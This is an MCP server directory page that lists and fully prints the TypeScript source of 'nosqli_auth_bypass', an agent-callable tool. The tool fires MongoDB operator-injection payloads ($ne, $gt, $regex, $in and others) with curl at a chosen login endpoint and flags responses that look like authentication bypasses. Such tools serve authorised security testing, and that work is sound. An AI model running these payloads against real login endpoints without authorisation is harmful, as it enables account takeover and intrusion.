Skip to main content
Glama
operantlabs

operant-mcp

Official
by operantlabs
OverviewSchemaRelated ServersScoreDiscussions
TypeScript
Local

nosqli_auth_bypass

Test authentication bypass using NoSQL injection by sending payloads that exploit MongoDB query operators like $ne, $gt, and $regex to bypass password validation checks.

Instructions

Test NoSQL operator injection ($ne, $gt, $regex) for authentication bypass. Sends payloads that abuse MongoDB query operators to bypass password checks. E.g., {"username":"admin","password":{"$ne":""}} matches any non-empty password. Returns: {results: [{payload_name, status, length, likely_bypass, snippet}]}. Side effects: Sends POST requests to the login endpoint. May create sessions.

Input Schema

TableJSON Schema
NameRequiredDescriptionDefault
urlYesLogin endpoint URL, e.g. https://target/login or https://target/api/auth
username_paramNoJSON field name for username, e.g. 'username' or 'email'username
password_paramNoJSON field name for passwordpassword
target_usernameNoUsername to bypass auth for, e.g. 'admin'admin

Implementation Reference

  • src/tools/nosqli.ts:13-196 (handler)
    The 'nosqli_auth_bypass' tool definition and handler implementation.
    server.tool(
  "nosqli_auth_bypass",
  "Test NoSQL operator injection ($ne, $gt, $regex) for authentication bypass. Sends payloads that abuse MongoDB query operators to bypass password checks. E.g., {\"username\":\"admin\",\"password\":{\"$ne\":\"\"}} matches any non-empty password. Returns: {results: [{payload_name, status, length, likely_bypass, snippet}]}. Side effects: Sends POST requests to the login endpoint. May create sessions.",
  {
    url: z
      .string()
      .describe(
        "Login endpoint URL, e.g. https://target/login or https://target/api/auth"
      ),
    username_param: z
      .string()
      .describe("JSON field name for username, e.g. 'username' or 'email'")
      .default("username"),
    password_param: z
      .string()
      .describe("JSON field name for password")
      .default("password"),
    target_username: z
      .string()
      .describe("Username to bypass auth for, e.g. 'admin'")
      .default("admin"),
  },
  async ({ url, username_param, password_param, target_username }) => {
    requireTool("curl");

    const payloads: [string, Record<string, unknown>][] = [
      [
        "$ne_empty",
        { [username_param]: target_username, [password_param]: { $ne: "" } },
      ],
      [
        "$ne_null",
        {
          [username_param]: target_username,
          [password_param]: { $ne: null },
        },
      ],
      [
        "$gt_empty",
        { [username_param]: target_username, [password_param]: { $gt: "" } },
      ],
      [
        "$regex_any",
        {
          [username_param]: target_username,
          [password_param]: { $regex: ".*" },
        },
      ],
      [
        "$exists_true",
        {
          [username_param]: target_username,
          [password_param]: { $exists: true },
        },
      ],
      [
        "both_$ne",
        {
          [username_param]: { $ne: "" },
          [password_param]: { $ne: "" },
        },
      ],
      [
        "$in_array",
        {
          [username_param]: target_username,
          [password_param]: { $in: ["", "password", "admin", "123456"] },
        },
      ],
      [
        "$nin_empty",
        {
          [username_param]: target_username,
          [password_param]: { $nin: [] },
        },
      ],
    ];

    // Baseline: legitimate failed login
    const baselineBody = JSON.stringify({
      [username_param]: target_username,
      [password_param]: "definitely_wrong_xyz789",
    });
    const baselineRes = await runCmd("curl", [
      "-sk",
      "-o",
      "-",
      "-w",
      "\n__META__%{http_code}:%{size_download}:%{redirect_url}",
      "-X",
      "POST",
      "-H",
      "Content-Type: application/json",
      "-d",
      baselineBody,
      url,
    ]);

    let blBody = baselineRes.stdout;
    const blMetaMarker = blBody.lastIndexOf("__META__");
    let blStatus = 0;
    let blLength = 0;
    if (blMetaMarker !== -1) {
      const meta = blBody.slice(blMetaMarker + 8).trim();
      const parts = meta.split(":");
      blStatus = parts.length > 0 ? parseInt(parts[0], 10) || 0 : 0;
      blLength = parts.length > 1 ? parseInt(parts[1], 10) || 0 : 0;
    }

    const results: Array<{
      payload_name: string;
      payload: string;
      status: number;
      length: number;
      redirect: string;
      likely_bypass: boolean;
      response_snippet: string;
    }> = [];

    for (const [payloadName, payloadBody] of payloads) {
      const data = JSON.stringify(payloadBody);
      const res = await runCmd("curl", [
        "-sk",
        "-o",
        "-",
        "-w",
        "\n__META__%{http_code}:%{size_download}:%{redirect_url}",
        "-X",
        "POST",
        "-H",
        "Content-Type: application/json",
        "-d",
        data,
        url,
      ]);

      let body = res.stdout;
      const metaMarker = body.lastIndexOf("__META__");
      let status = 0;
      let length = 0;
      let redirect = "";
      if (metaMarker !== -1) {
        const meta = body.slice(metaMarker + 8).trim();
        const parts = meta.split(":");
        status = parts.length > 0 ? parseInt(parts[0], 10) || 0 : 0;
        length = parts.length > 1 ? parseInt(parts[1], 10) || 0 : 0;
        redirect = parts.length > 2 ? parts[2] : "";
        body = body.slice(0, metaMarker);
      }

      const likelyBypass =
        (status !== blStatus && [200, 302, 303].includes(status)) ||
        (Math.abs(length - blLength) > 50 && status === 200) ||
        Boolean(
          redirect &&
            (redirect.toLowerCase().includes("dashboard") ||
              redirect.toLowerCase().includes("account"))
        );

      results.push({
        payload_name: payloadName,
        payload: data,
        status,
        length,
        redirect,
        likely_bypass: likelyBypass,
        response_snippet: body.slice(0, 500),
      });
    }

    const bypasses = results.filter((r) => r.likely_bypass);
    const result = {
      baseline: { status: blStatus, length: blLength },
      results,
      bypass_payloads: bypasses.map((r) => r.payload_name),
      hint:
        bypasses.length > 0
          ? `NoSQL auth bypass detected with: ${JSON.stringify(bypasses.map((r) => r.payload_name))}`
          : "No auth bypass detected. Server may not use MongoDB or properly sanitizes operators.",
    };

    return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] };
  }
);
Install Server

Other Tools

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/operantlabs/operant-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server